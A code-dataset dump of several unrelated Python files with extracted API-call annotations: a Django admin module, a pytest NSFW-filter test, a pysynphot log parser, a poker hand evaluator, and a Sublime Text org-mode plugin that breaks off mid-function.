"tenso... | [((2188, 2215), 'tensorflow.keras.activations.get', 'activations.get', (['activation'], {}), '(activation)\n', (2203, 2215), False, 'from tensorflow.keras import activations, initializers, regularizers, constraints\n'), ((2283, 2319), 'tensorflow.keras.initializers.get', 'initializers.get', (['kernel_initializer'], {}), '(kernel_initializer)\n', (2299, 2319), False, 'from tensorflow.keras import activations, initializers, regularizers, constraints\n'), ((2352, 2386), 'tensorflow.keras.initializers.get', 'initializers.get', (['bias_initializer'], {}), '(bias_initializer)\n', (2368, 2386), False, 'from tensorflow.keras import activations, initializers, regularizers, constraints\n'), ((2421, 2457), 'tensorflow.keras.regularizers.get', 'regularizers.get', (['kernel_regularizer'], {}), '(kernel_regularizer)\n', (2437, 2457), False, 'from tensorflow.keras import activations, initializers, regularizers, constraints\n'), ((2490, 2524), 'tensorflow.keras.regularizers.get', 'regularizers.get', (['bias_regularizer'], {}), '(bias_regularizer)\n', (2506, 2524), False, 'from tensorflow.keras import activations, initializers, regularizers, constraints\n'), ((2558, 2592), 'tensorflow.keras.constraints.get', 'constraints.get', (['kernel_constraint'], {}), '(kernel_constraint)\n', (2573, 2592), False, 'from tensorflow.keras import activations, initializers, regularizers, constraints\n'), ((2624, 2656), 'tensorflow.keras.constraints.get', 'constraints.get', (['bias_constraint'], {}), '(bias_constraint)\n', (2639, 2656), False, 'from tensorflow.keras import activations, initializers, regularizers, constraints\n'), ((3712, 3742), 'spektral.layers.ops.dot', 'ops.dot', (['features', 'self.kernel'], {}), '(features, self.kernel)\n', (3719, 3742), False, 'from spektral.layers import ops\n'), ((3760, 3788), 'spektral.layers.ops.filter_dot', 'ops.filter_dot', (['fltr', 'output'], {}), '(fltr, output)\n', (3774, 3788), False, 'from spektral.layers import ops\n'), ((5003, 5025), 
'spektral.utils.localpooling_filter', 'localpooling_filter', (['A'], {}), '(A)\n', (5022, 5025), False, 'from spektral.utils import localpooling_filter\n'), ((3837, 3866), 'tensorflow.keras.backend.bias_add', 'K.bias_add', (['output', 'self.bias'], {}), '(output, self.bias)\n', (3847, 3866), True, 'from tensorflow.keras import backend as K\n'), ((4265, 4303), 'tensorflow.keras.activations.serialize', 'activations.serialize', (['self.activation'], {}), '(self.activation)\n', (4286, 4303), False, 'from tensorflow.keras import activations, initializers, regularizers, constraints\n'), ((4378, 4425), 'tensorflow.keras.initializers.serialize', 'initializers.serialize', (['self.kernel_initializer'], {}), '(self.kernel_initializer)\n', (4400, 4425), False, 'from tensorflow.keras import activations, initializers, regularizers, constraints\n'), ((4459, 4504), 'tensorflow.keras.initializers.serialize', 'initializers.serialize', (['self.bias_initializer'], {}), '(self.bias_initializer)\n', (4481, 4504), False, 'from tensorflow.keras import activations, initializers, regularizers, constraints\n'), ((4540, 4587), 'tensorflow.keras.regularizers.serialize', 'regularizers.serialize', (['self.kernel_regularizer'], {}), '(self.kernel_regularizer)\n', (4562, 4587), False, 'from tensorflow.keras import activations, initializers, regularizers, constraints\n'), ((4621, 4666), 'tensorflow.keras.regularizers.serialize', 'regularizers.serialize', (['self.bias_regularizer'], {}), '(self.bias_regularizer)\n', (4643, 4666), False, 'from tensorflow.keras import activations, initializers, regularizers, constraints\n'), ((4701, 4746), 'tensorflow.keras.constraints.serialize', 'constraints.serialize', (['self.kernel_constraint'], {}), '(self.kernel_constraint)\n', (4722, 4746), False, 'from tensorflow.keras import activations, initializers, regularizers, constraints\n'), ((4779, 4822), 'tensorflow.keras.constraints.serialize', 'constraints.serialize', (['self.bias_constraint'], {}), 
'(self.bias_constraint)\n', (4800, 4822), False, 'from tensorflow.keras import activations, initializers, regularizers, constraints\n')] |
from django.contrib import admin
from .models import Device,Metric
class DeviceAdmin(admin.ModelAdmin):
    """Admin options for Device: searchable by name/token, filterable by owner."""
    search_fields = ["name", "token"]
    list_filter = ("user",)
    list_display = ["name", "token", "user", "created_date"]
class MetricAdmin(admin.ModelAdmin):
    """Admin options for Metric readings: searchable and filterable by device."""
    search_fields = ["device"]
    list_filter = ("device",)
    list_display = ["device", "temperature", "humidity", "created_date"]
# Expose both models in the Django admin with their customized option classes.
admin.site.register(Device, DeviceAdmin)
admin.site.register(Metric, MetricAdmin)
| [
"django.contrib.admin.site.register"
] | [((404, 444), 'django.contrib.admin.site.register', 'admin.site.register', (['Device', 'DeviceAdmin'], {}), '(Device, DeviceAdmin)\n', (423, 444), False, 'from django.contrib import admin\n'), ((445, 485), 'django.contrib.admin.site.register', 'admin.site.register', (['Metric', 'MetricAdmin'], {}), '(Metric, MetricAdmin)\n', (464, 485), False, 'from django.contrib import admin\n')] |
from django.urls import reverse
from pytest import mark
from core.models import *
urls = [reverse(name) for name in ["core:index", "core:arts"]]
@mark.parametrize("url", urls)
@mark.django_db
def test_nsfw_filter(url, django_user_model, client):
    """NSFW arts must disappear from listings for users whose nsfw_pref is 'HA'."""
    artist = django_user_model.objects.create(username="bob", password="<PASSWORD>")
    viewer = django_user_model.objects.create(username="alice", password="<PASSWORD>")
    viewer.following.add(artist)

    safe_art = Art(id=1, artist=artist, title="sfw", text="sfw", nsfw=False)
    adult_art = Art(id=2, artist=artist, title="nsfw", text="nsfw", nsfw=True)
    safe_art.save()
    adult_art.save()

    client.force_login(viewer)

    # Default preference: both arts are visible.
    shown = client.get(url).context["arts"]
    assert safe_art in shown
    assert adult_art in shown

    # 'HA' preference: the NSFW art is filtered out, the SFW one remains.
    viewer.nsfw_pref = "HA"
    viewer.save()
    shown = client.get(url).context["arts"]
    assert safe_art in shown
    assert adult_art not in shown
| [
"pytest.mark.parametrize",
"django.urls.reverse"
] | [((150, 179), 'pytest.mark.parametrize', 'mark.parametrize', (['"""url"""', 'urls'], {}), "('url', urls)\n", (166, 179), False, 'from pytest import mark\n'), ((92, 105), 'django.urls.reverse', 'reverse', (['name'], {}), '(name)\n', (99, 105), False, 'from django.urls import reverse\n')] |
"""This script *replaces* the processlog.csh shell script. It has
more sophisticated logic to add the etc test name to the pysynphot
command as another keyword-value pair.
Modified to parse the modified line, then write a dictionary that will
be read by the gencases tool.
"""
import sys,re, pickle
from pysynphot import etc
import gencases
def run(fname):
    """Parse an etc test log and pickle a lookup of commands to test names.

    For each pysynphot command found in the log, an ``etcid`` keyword is
    appended carrying the test name that produced it; the command is turned
    into a key tuple via ``gencases.line2ktuple`` and mapped to the list of
    test names that generated it.  The dictionary is pickled to ``fname``
    with ``.txt`` replaced by ``_lookup.pickle``.

    Fixes over the previous version:
      * the output file is opened in binary mode ('wb'), as required by
        pickle under Python 3 (text mode raised TypeError);
      * iterating the file directly instead of ``readline().strip()`` in a
        ``while len(line) > 0`` loop, which silently stopped parsing at the
        first blank line rather than at EOF;
      * files are managed with ``with`` so they close on any error.
    """
    d = {}
    testname = None  # most recently seen test name; tags subsequent commands
    with open(fname) as logfile:
        for rawline in logfile:
            line = rawline.strip()
            if "] starting" in line or "] running" in line:
                # Capture the quoted test name, e.g. ... starting 'name' ...
                x = re.search("'(?P<name>.*)'", line)
                testname = x.group('name')
            elif 'command is' in line:
                _, _, value = line.lstrip().partition('command is')
                # Drop the trailing two characters and tag with the test name.
                cmd = '%s&etcid="%s"\n' % (value[0:-2], testname)
                # Entry in the new dictionary
                ktuple = gencases.line2ktuple(cmd)
                d.setdefault(ktuple, []).append(testname)
    # Save the resulting library (binary mode is mandatory for pickle).
    with open(fname.replace('.txt', '_lookup.pickle'), 'wb') as out:
        pickle.dump(d, out)
out.close()
if __name__ == '__main__':
    # Usage: python <this script> <logfile.txt>
    run(sys.argv[1])
| [
"gencases.line2ktuple",
"pickle.dump",
"re.search"
] | [((1136, 1155), 'pickle.dump', 'pickle.dump', (['d', 'out'], {}), '(d, out)\n', (1147, 1155), False, 'import sys, re, pickle\n'), ((598, 631), 're.search', 're.search', (['"""\'(?P<name>.*)\'"""', 'line'], {}), '("\'(?P<name>.*)\'", line)\n', (607, 631), False, 'import sys, re, pickle\n'), ((915, 940), 'gencases.line2ktuple', 'gencases.line2ktuple', (['cmd'], {}), '(cmd)\n', (935, 940), False, 'import gencases\n')] |
import teek
def on_click():
    # Button callback: fires on every press.
    print("You clicked me!")
# Build a window containing a single button wired to the callback above.
window = teek.Window()
button = teek.Button(window, "Click me", command=on_click)
button.pack()
# Closing the window terminates the teek main loop.
window.on_delete_window.connect(teek.quit)
teek.run()
| [
"teek.run",
"teek.Window",
"teek.Button"
] | [((70, 83), 'teek.Window', 'teek.Window', ([], {}), '()\n', (81, 83), False, 'import teek\n'), ((93, 142), 'teek.Button', 'teek.Button', (['window', '"""Click me"""'], {'command': 'on_click'}), "(window, 'Click me', command=on_click)\n", (104, 142), False, 'import teek\n'), ((200, 210), 'teek.run', 'teek.run', ([], {}), '()\n', (208, 210), False, 'import teek\n')] |
# -*- coding: utf-8 -*-
"""
Created on Wed Dec 4 13:54:27 2019
@author: eric.qian
"""
from collections import Counter
from itertools import combinations
# Numeric hand rankings, higher integer value is stronger hand
HAND_RANKINGS = {0: 'High Card',
1: 'One Pair',
2: 'Two Pair',
3: 'Trips',
4: 'Straight',
5: 'Flush',
6: 'Full House',
7: 'Quads',
8: 'Straight Flush'}
# Card values mapped to integer strengths, higher integer value stronger
CARD_VALS = {'2':1,
'3':2,
'4':3,
'5':4,
'6':5,
'7':6,
'8':7,
'9':8,
'10':9,
'J':10,
'Q':11,
'K':12,
'A':13}
# Cache mapper
REVERSE_VALS = {v:k for k,v in CARD_VALS.items()}
def check_flush(suits):
    """Return True if every card shares the same suit, else False.

    Previously returned None (implicitly) for a non-flush and raised
    IndexError on an empty list; callers only test truthiness, so an
    explicit bool and an empty-input guard are backward compatible.
    """
    if not suits:
        return False
    # A flush means the first suit accounts for every card in the hand.
    return suits.count(suits[0]) == len(suits)
def check_strt(card_vals):
    """Return True if the card values form a straight, else False.

    Handles the wheel (A,2,3,4,5 -> values [1,2,3,4,13]) explicitly.
    Previously returned None (implicitly) for a non-straight and raised
    ValueError on empty input; callers only test truthiness, so an
    explicit bool and an empty-input guard are backward compatible.
    """
    if not card_vals:
        return False
    ordered = sorted(card_vals)
    # Edge case of A,2,3,4,5 straight (ace plays low)
    if ordered == [1, 2, 3, 4, 13]:
        return True
    # Five consecutive values normalize to 0,1,2,3,4 after subtracting the min.
    lo = ordered[0]
    return [v - lo for v in ordered] == [0, 1, 2, 3, 4]
def read_hand(hand):
    """
    hand :: list of str :: unordered str hand value representation, i.e. ['As','As','2h','2s','Ks']
    =========
    returns
    hand_strength :: list of int :: sequential integer representation of hand strs,
    [HAND_RANKINGS, HIGH_CARD_1, HIGH_CARD_2, HIGH_CARD_3, HIGH_CARD_4] in descending strength priority

    For example, if we have Two pairs Aces and 2s w/ K high:
        [2,13,1,12] -> [Two Pair int val, Ace int val, 2 int val, K int val]

    desc :: str :: full description of hand

    BUGFIX: always returns the (hand_strength, desc) pair.  The A-2-3-4-5
    straight-flush branch previously returned a bare string, which broke
    tuple-unpacking callers such as eval_combos.
    """
    # Initialize ranking and description
    ranking = 0
    desc = ''
    # Split card vals and suits. 10 is edge case (two-character rank)
    suits = [i[1] if '10' not in i else i[2] for i in hand]
    card_vals = [CARD_VALS[i[0]] if '10' not in i else CARD_VALS['10'] for i in hand]
    # Unique card counts, hands are easily evaluated with dict of count of cards
    card_counter = Counter(card_vals)
    # Straight flush ranking
    if check_flush(suits) and check_strt(card_vals):
        ranking = 8
    # Flush ranking
    elif check_flush(suits):
        ranking = 5
    # Straight ranking
    elif check_strt(card_vals):
        ranking = 4
    # If there are only 2 unique cards, must be quads or full house
    elif len(card_counter) == 2:
        # If 2 cards and counts are 3,2 is full house
        if 3 in card_counter.values():
            ranking = 6
        # Otherwise, quads
        else:
            ranking = 7
    # Must be trips or two pairs
    elif len(card_counter) == 3:
        if 3 in card_counter.values():
            ranking = 3
        else:
            ranking = 2
    # Must be one pairs
    elif len(card_counter) == 4:
        ranking = 1
    # High card
    else:
        ranking = 0
    # Init hand strength vector
    hand_strength = [ranking]
    # Add hand strength data
    # Sort card counter dict by count, card integer value, and add data. This is enough info to rank hands
    sorted_high_cards = sorted(card_counter.items(), key=lambda x: (x[1],x[0]), reverse=True)
    for i in range(len(sorted_high_cards)):
        hand_strength.append(sorted_high_cards.pop(0)[0])
    # Logic to describe hand
    desc_vals = [str(REVERSE_VALS[i]) if idx > 0 else 'None' for idx, i in enumerate(hand_strength)]
    if ranking == 8:
        if 13 in hand_strength and 4 in hand_strength:
            # Wheel (A-2-3-4-5): the ace plays low, so describe as 5 high.
            # BUGFIX: set desc and fall through to the common return below,
            # instead of returning the bare string (which broke unpacking).
            # NOTE(review): hand_strength still ranks the wheel's ace high
            # (13), so a wheel compares above higher straight flushes —
            # verify whether that ordering is intended.
            desc = 'Straight Flush 5 high'
        else:
            desc = 'Straight Flush ' + desc_vals[1] + ' high'
    elif ranking == 7:
        desc = 'Quad ' + desc_vals[1] + ' ' + desc_vals[2] + ' high'
    elif ranking == 6:
        desc = 'Full House ' + desc_vals[1] + ' full of ' + desc_vals[2]
    elif ranking == 5:
        desc = 'Flush ' + desc_vals[1] + ' high'
    elif ranking == 4:
        desc = 'Straight ' + desc_vals[1] + ' high'
    elif ranking == 3:
        desc = 'Trip ' + desc_vals[1]
    elif ranking == 2:
        desc = 'Two Pairs ' + desc_vals[1] + ' and '+desc_vals[2]+' '+desc_vals[3]+' high'
    elif ranking == 1:
        desc = 'One Pair ' + desc_vals[1] + ' ' + desc_vals[2] + desc_vals[3] + desc_vals[4] + ' high'
    elif ranking == 0:
        desc = 'High Card ' + desc_vals[1] + ' ' + desc_vals[2] + desc_vals[3] + desc_vals[4] + desc_vals[5] +' high'
    return hand_strength, desc
def eval_hands(hands):
    """
    hands :: list :: list of int hand_strength vectors (1st output of read_hand)
    =======
    Returns
    index (int) of the strongest hand in `hands`; when hands are fully
    tied (a split), the first of the tied hands is returned.

    Fix: the bare ``except:`` is narrowed to ``except IndexError`` — the
    only expected failure, raised when the comparison runs past the end of
    the strength vectors (i.e. the remaining hands are tied).
    """
    card = 0
    candidates = list(range(len(hands)))
    # Hierarchical comparison: at each position keep only the hands with
    # the maximum value there, then move on to the next position.
    while len(candidates) > 1:
        try:
            strongest = max(hands[hand][card] for hand in candidates)
        except IndexError:
            # Ran out of comparison positions: the remaining hands split.
            break
        candidates = [h for h in candidates if hands[h][card] == strongest]
        card += 1
    return candidates[0]
def eval_combos(hands):
    """Score every candidate hand and return the strongest one as a
    (hand, hand_strength, description) triple."""
    scored = [read_hand(hand) for hand in hands]
    strengths = [strength for strength, _ in scored]
    winner = eval_hands(strengths)
    return hands[winner], strengths[winner], scored[winner][1]
def combos(cards, n = 5):
    """Return every n-card combination of cards, each combo as a list."""
    return list(map(list, combinations(cards, n)))
| [
"collections.Counter",
"itertools.combinations"
] | [((2383, 2401), 'collections.Counter', 'Counter', (['card_vals'], {}), '(card_vals)\n', (2390, 2401), False, 'from collections import Counter\n'), ((6462, 6484), 'itertools.combinations', 'combinations', (['cards', 'n'], {}), '(cards, n)\n', (6474, 6484), False, 'from itertools import combinations\n')] |
import sublime
import sublime_plugin
import datetime
import re
from pathlib import Path
import os
import fnmatch
import OrgExtended.orgparse.loader as loader
import OrgExtended.orgparse.node as node
import OrgExtended.orgparse.date as orgdate
from OrgExtended.orgparse.sublimenode import *
import OrgExtended.orgutil.util as util
import OrgExtended.orgutil.navigation as nav
import OrgExtended.orgutil.template as templateEngine
import logging
import sys
import traceback
import OrgExtended.orgfolding as folding
import OrgExtended.orgdb as db
import OrgExtended.asettings as sets
import OrgExtended.pymitter as evt
import OrgExtended.orgproperties as props
import OrgExtended.orgdatepicker as datep
import OrgExtended.orginsertselected as insSel
import OrgExtended.orglinks as orglink
import OrgExtended.orgneovi as nvi
import OrgExtended.orgagenda as oa
import OrgExtended.orgcheckbox as checkbox
import OrgExtended.orgnumberedlist as numberedlist
log = logging.getLogger(__name__)
# MOVING TO ANY DONE STATE:
# Support these:
#+STARTUP: lognotedone Prompt and stored below the item with a Closing Note heading.
#+STARTUP: logdone CLOSED: [TIMESTAMP] in LOGBOOK
# As well as configuration options
#
# PER TRANSITON MOVEMENT:
# @ - note
# ! - timestamp
# / - when leaving the state if next state doesn't log
#
# Then they go futher with: :LOGGING: WAIT(@) logrepeat properties
#
# - 1) We need the transitions recorded in the node (in the todos list)
# - 2) We need a method to insert CLOSED: and or prompt and note
# - 3) We need to track the state transitions themselves (from / to)
#
# - 4) Habits break all this with LAST_REPEAT and To From transition text.
#
RE_CLOSED = re.compile(r"^\s*CLOSED:\s*\[.*\]")
def LocateClosed(view,node):
    """Scan the node's own rows for a CLOSED: stamp.

    Returns the line region containing the stamp, or None when absent.
    """
    for row in range(node.start_row, node.local_end_row + 1):
        region = view.line(view.text_point(row, 0))
        if RE_CLOSED.search(view.substr(region)):
            return region
    return None
def InsertClosed(view, node, onDone=None):
    """Insert, or refresh in place, an inactive CLOSED: stamp for node."""
    stamp = OrgDate.format_clock(datetime.datetime.now(), active=False)
    existing = LocateClosed(view, node)
    if existing:
        # A stamp already exists: overwrite that line with a fresh one.
        view.ReplaceRegion(existing, node.indent() + "CLOSED: " + stamp, onDone)
        return
    row = node.start_row + 1
    pt = view.text_point(row, 0)
    # Past the last row there is no line to prepend to, so lead with a newline.
    prefix = "\n" if view.isBeyondLastRow(row) else ""
    view.Insert(pt, prefix + node.indent() + "CLOSED: " + stamp + "\n", onDone)
def RemoveClosed(view, node, onDone=None):
    """Delete the node's CLOSED: line if present, then signal onDone."""
    region = LocateClosed(view, node)
    if not region:
        # Nothing to remove; still fire the continuation.
        evt.EmitIf(onDone)
        return
    view.ReplaceRegion(region.IncEnd(), "", onDone)
def IsDoneState(node, toState):
    """True when toState is one of the document's DONE keywords."""
    done_keys = node.env.done_keys
    return any(key == toState for key in done_keys)
def ShouldRecur(node, fromState, toState):
    """Return the first repeating timestamp on node when it is moving to a
    DONE state, else None (non-done transitions never recur)."""
    if not IsDoneState(node, toState):
        return None
    # SCHEDULED and DEADLINE take precedence over plain body timestamps.
    for stamp in (node.scheduled, node.deadline):
        if stamp and stamp.repeating:
            return stamp
    for stamp in node.get_timestamps(active=True, point=True, range=True):
        if stamp and stamp.repeating:
            return stamp
    return None
def ShouldClose(node, fromState, toState):
    """True when moving to toState should stamp a CLOSED: line.

    Repeating tasks never close; otherwise a stamp is wanted when toState
    is a DONE keyword and the buffer startup enables Startup.logdone.
    """
    if ShouldRecur(node, fromState, toState):
        return False
    # NOTE: We need to get the todo transitions
    # into this as well!
    toState = toState.strip()
    startup = node.root.startup()
    if IsDoneState(node, toState) and Startup.logdone in startup:
        return True
    # Previously fell through returning None implicitly; an explicit False
    # makes the boolean contract clear (callers only truth-test).
    return False
def InsertRecurrence(view, node, fromState, toState, onDone=None):
    """Log a state transition on a repeating task and bump LAST_REPEAT.

    Adds a logbook entry like:
      - State "DONE"        from "TODO"        [timestamp]
    then updates the LAST_REPEAT property with the same inactive stamp.
    """
    # - State "DONE" from "TODO" [2009-09-29 Tue]"
    stamp = OrgDate.format_clock(datetime.datetime.now(),active=False)
    def OnLogAdded():
        # Chained so the property edit runs only after the logbook edit lands.
        props.UpdateProperty(view, node, "LAST_REPEAT", stamp, onDone)
    props.AddLogbook(view,node, "- State {0:12} from {1:12} ".format('"' + toState + '"', '"' + fromState + '"'), stamp, evt.Make(OnLogAdded))
def InsertNote(view, node, text, fromState, toState, onDone=None):
    """Record a closing note for a state change in the node's logbook."""
    stamp = OrgDate.format_clock(datetime.datetime.now(), active=False)
    heading = "Note (to:{0},at:{1}): ".format(toState, stamp)
    props.AddLogbook(view, node, heading, text, onDone)
def ShouldNote(node, fromState, toState):
    """True when moving to toState should prompt the user for a note.

    Repeating tasks never prompt; otherwise a note is wanted when toState
    is a DONE keyword and the buffer startup enables Startup.lognotedone.
    """
    if ShouldRecur(node, fromState, toState):
        return False
    # NOTE: We need to get the todo transitions
    # into this as well!
    toState = toState.strip()
    startup = node.root.startup()
    if IsDoneState(node, toState) and Startup.lognotedone in startup:
        return True
    # Previously fell through returning None implicitly; explicit False
    # matches ShouldClose and makes the boolean contract clear.
    return False
# Matches an active timestamp <YYYY-MM-DD ...> preceded by whitespace.
RE_T = re.compile(r'\s(?P<time><\s*\d+-\d+-\d+\s+[^>]+>)(\s+|$)')
# Use a menu to change the todo state of an item
class OrgTodoChangeCommand(sublime_plugin.TextCommand):
    """Change the TODO state of the heading at point via a quick panel.

    The transition pipeline runs as a chain of callbacks:
      on_done -> do_note_if_needed -> do_close_if_needed ->
      do_recurrence_if_needed -> on_update_timestamps_if_needed ->
      on_totally_done
    """
    def on_totally_done(self):
        # End of the pipeline: fire the caller's continuation, if any.
        evt.EmitIf(self.onDone)
    # recurrence needs to update the base timestamp!
    # This needs to respect the .+ ++ and + markers
    def on_update_timestamps_if_needed(self, row=0):
        """Advance the first repeating timestamp at/after row, then recurse
        (via the replace callback) to handle the remaining rows."""
        # We have to reload our node as we updated things.
        self.node = db.Get().At(self.view, self.node.start_row)
        if(row > (self.node.local_end_row+1)):
            # NOTE(review): no return after this call, so on_totally_done can
            # fire twice when row overruns — the loop below is empty then, so
            # the fall-through also calls it. Verify intent before changing.
            self.on_totally_done()
        for i in range(self.node.start_row+row, self.node.local_end_row+1):
            pt = self.view.text_point(i, 0)
            line = self.view.line(pt)
            txt = self.view.substr(line)
            m = RE_T.search(txt)
            now = datetime.datetime.now()
            if(m):
                tsl = OrgDate.list_from_str(m.group('time'))
                if(tsl):
                    t = tsl[0]
                    if(t.repeating):
                        # next/next2 shadow the builtin next(); next2 is unused.
                        next = t.start
                        next2 = t.end
                        # "+"  : bump once past the base date
                        # "++" : bump repeatedly until in the future
                        # ".+" : restart the interval from now
                        if(t.repeatpre == "+"):
                            next = t.next_repeat_from(oa.EnsureDateTime(next))
                        elif(t.repeatpre == "++"):
                            while(next < now):
                                next = t.next_repeat_from(oa.EnsureDateTime(next))
                        elif(t.repeatpre == ".+"):
                            next = t.next_repeat_from(now)
                        s = m.start(1)
                        e = m.end(1)
                        # Rebuild the repeat (and optional warning) suffix.
                        rpt = t.repeatpre + str(t.repeatnum) + t.repeatdwmy
                        wrn = ""
                        if(t.warning):
                            wrn = " " + t.warnpre + str(t.warnnum) + t.warndwmy
                        if(t.has_end()):
                            if(t.has_time()):
                                nout = txt[:s] + next.strftime("<%Y-%m-%d %a %H:%M-") + t.end.strftime("%H:%M ")+ rpt + wrn + ">" + txt[e:]
                            else:
                                # This really shouldn't happen.
                                nout = txt[:s] + next.strftime("<%Y-%m-%d %a ")+ rpt + wrn + ">" + txt[e:]
                        else:
                            if(t.has_time()):
                                nout = txt[:s] + next.strftime("<%Y-%m-%d %a %H:%M ") + rpt + wrn + ">" +txt[e:]
                            else:
                                nout = txt[:s] + next.strftime("<%Y-%m-%d %a ")+ rpt + wrn + ">" + txt[e:]
                        # Replace this line, then continue from the next row
                        # once the async edit completes.
                        self.view.run_command("org_internal_replace", {"start": line.begin(), "end": line.end(), "text": nout, "onDone": evt.Make(lambda:self.on_update_timestamps_if_needed(i+1)) })
                        return
        self.on_totally_done()
    def do_recurrence_if_needed(self):
        """Log the transition and advance timestamps for repeating tasks."""
        self.rec = ShouldRecur(self.node,self.fromState,self.newState)
        if(self.rec):
            InsertRecurrence(self.view, self.node, self.fromState, self.newState, evt.Make(self.on_update_timestamps_if_needed))
        else:
            self.on_totally_done()
    def do_close_if_needed(self):
        """Insert a CLOSED: stamp on close, or remove a stale one."""
        if(ShouldClose(self.node,self.fromState,self.newState)):
            InsertClosed(self.view, self.node, evt.Make(self.do_recurrence_if_needed))
        else:
            RemoveClosed(self.view, self.node, evt.Make(self.do_recurrence_if_needed))
    def on_insert_note(self, text):
        # Input-panel callback carrying the user's closing note.
        InsertNote(self.view, self.node, text, self.fromState, self.newState, evt.Make(self.do_close_if_needed))
    def do_note_if_needed(self):
        """Prompt for a closing note when the startup options require one."""
        if(ShouldNote(self.node,self.fromState, self.newState)):
            self.view.window().show_input_panel("("+self.fromState + ">>" + self.newState + ") Note:","", self.on_insert_note, None, None)
        else:
            self.do_close_if_needed()
    def on_done_st4(self,index,modifers):
        # ST4 quick panels pass (index, modifiers); delegate to on_done.
        self.on_done(index)
    def on_done(self, index):
        """Quick-panel callback: rewrite the heading with the chosen state."""
        if(index < 0):
            return
        newState = self.todoStates[index]
        if(newState == "none"):
            newState = ""
        # if we don't have a TODO state then we have to handle that as well.
        m = self.todoRe.search(self.bufferContents)
        fromState = None
        if(m == None):
            self.todoRe = re.compile(r"^([*]+ (\[\#[a-zA-Z0-9]+\]\s+)?)( )*")
        else:
            fromState = m.group(3)
        if(newState != ""):
            newState += " "
        self.bufferContents = self.todoRe.sub(r"\g<1>" + newState, self.bufferContents)
        # We have to do the editing in sequence because the reloads can get mixed up otherwise
        if(fromState):
            self.fromState = fromState.strip()
        else:
            self.fromState = ""
        self.newState = newState.strip()
        # Recurring events do not hit the done state when you toggle them
        # They bounce back to TODO they just get a new note in them
        if(ShouldRecur(self.node, self.fromState,self.newState)):
            self.do_note_if_needed()
        else:
            self.view.ReplaceRegion(self.row,self.bufferContents, evt.Make(self.do_note_if_needed))
    def run(self, edit, onDone=None):
        """Build the todo-state list and regex, then show the quick panel."""
        self.onDone = onDone
        self.node = db.Get().AtInView(self.view)
        #self.todoStates = sets.Get("todoStates", sets.defaultTodoStates)
        todos = self.node.env.all_todo_keys
        if(len(todos) > 0):
            self.todoStates = todos
            self.todoStates += ["none"]
        else:
            for i in range(0, len(self.todoStates)):
                if(self.todoStates[i] == "|"):
                    self.todoStates[i] = "none"
        # ACTION vs DONE states
        # TODO" "FEEDBACK" "VERIFY" "|" "DONE" "DELEGATED
        row = self.node.start_row
        # Build an alternation of every state ("|" separator excluded).
        self.todoRe = r"^([*]+ (\[\#[a-zA-Z0-9]+\]\s+)?)("
        haveFirst = False
        for state in self.todoStates:
            if state != "|":
                if(haveFirst):
                    self.todoRe += "|"
                self.todoRe += state
                haveFirst = True
        self.todoRe += r")( )*"
        self.todoRe = re.compile(self.todoRe)
        sp = self.view.text_point(row,0)
        self.row = self.view.line(sp)
        self.bufferContents = self.view.substr(self.row)
        # ST4 (build > 4096) quick panels use the two-argument callback.
        if(int(sublime.version()) <= 4096):
            self.view.window().show_quick_panel(self.todoStates, self.on_done, -1, -1)
        else:
            self.view.window().show_quick_panel(self.todoStates, self.on_done_st4, -1, -1)
# Use a menu to change the priority of an item
# Use a menu to change the priority of an item
class OrgPriorityChangeCommand(sublime_plugin.TextCommand):
    """Change the [#X] priority cookie on the heading at point via a
    quick panel; choosing "none" removes the cookie."""
    def on_done_st4(self,index,modifers):
        # ST4 quick panels pass (index, modifiers); delegate to on_done.
        self.on_done(index)
    def on_done(self, index):
        """Quick-panel callback: rewrite the heading with the chosen priority."""
        if(index < 0):
            return
        newState = self.priorities[index]
        if(newState == "none"):
            newState = ""
        # if we don't have a priority cookie then we have to handle that as well.
        m = self.Re.search(self.bufferContents)
        if(m == None):
            # Heading has no cookie: anchor insertion just after any TODO state.
            todos = self.node.env.all_todo_keys
            todos = '|'.join(todos)
            self.Re = re.compile(r"^([*]+\s+(" + todos + r")?\s*)( )*")
        if(newState != ""):
            newState = "[#" + newState + "] "
        self.bufferContents = self.Re.sub(r"\g<1>" + newState, self.bufferContents)
        self.view.ReplaceRegion(self.row, self.bufferContents, self.onDone)
    def run(self, edit, onDone = None):
        """Collect the available priorities and show the quick panel."""
        self.onDone = onDone
        self.node = db.Get().AtInView(self.view)
        self.priorities = self.node.priorities()
        # Copy before appending so we never mutate the node's own list.
        # (Was copy.copy(...), which depended on `copy` arriving via a
        # wildcard import; list() is explicit and always available.)
        self.priorities = list(self.priorities)
        self.priorities.append("none")
        row = self.node.start_row
        self.Re = r"^([*]+ [^\[\]]*\s*)(\[\#[a-zA-Z0-9]+\]\s+)"
        self.Re = re.compile(self.Re)
        sp = self.view.text_point(row,0)
        self.row = self.view.line(sp)
        self.bufferContents = self.view.substr(self.row)
        # ST4 (build > 4096) quick panels use the two-argument callback.
        if(int(sublime.version()) <= 4096):
            self.view.window().show_quick_panel(self.priorities, self.on_done, -1, -1)
        else:
            self.view.window().show_quick_panel(self.priorities, self.on_done_st4, -1, -1)
def indent_node(view, node, edit):
    """Demote node one level: prepend a star to its heading, a space to
    each body line, and recursively demote every child."""
    heading_pt = view.text_point(node.start_row, 0)
    view.insert(edit, heading_pt, "*")
    for row in range(node.start_row + 1, node.local_end_row + 1):
        view.insert(edit, view.text_point(row, 0), " ")
    for child in node.children:
        indent_node(view, child, edit)
def indent_list(view, row, edit):
    """Indent the list line at row, then every child line beneath it
    (children are found by their deeper indentation)."""
    view.insert(edit, view.text_point(row, 0), " ")
    line = view.lineAt(row)
    children, last_row = numberedlist.findChildrenByIndent(view, line)
    for child_row in range(row + 1, last_row):
        view.insert(edit, view.text_point(child_row, 0), " ")
def deindent_list(view, row, edit):
    """Remove one level of indentation (leading spaces or a single tab)
    from the list line at row and from each of its indented children."""
    # Get my position and ensure this node CAN de-indent
    sp = view.text_point(row,0)
    ep = view.text_point(row,1)
    np = view.text_point(row,2)
    # NOTE(review): the space-literal comparisons below may originally have
    # been two spaces (the region sp..np spans two columns) — whitespace in
    # this file looks mangled; confirm against upstream before editing.
    bufferContents = view.substr(sublime.Region(sp,np))
    bufferContentsS = view.substr(sublime.Region(sp,ep))
    wasTab = bufferContentsS == "\t"
    if(bufferContents == " " or wasTab):
        if(wasTab):
            view.erase(edit,sublime.Region(sp,ep))
        else:
            view.erase(edit,sublime.Region(sp,np))
        line = view.lineAt(row)
        children,crow = numberedlist.findChildrenByIndent(view, line)
        # Repeat the same single-level strip on every child row.
        for r in range(row+1,crow):
            sp = view.text_point(r,0)
            ep = view.text_point(r,1)
            np = view.text_point(r,2)
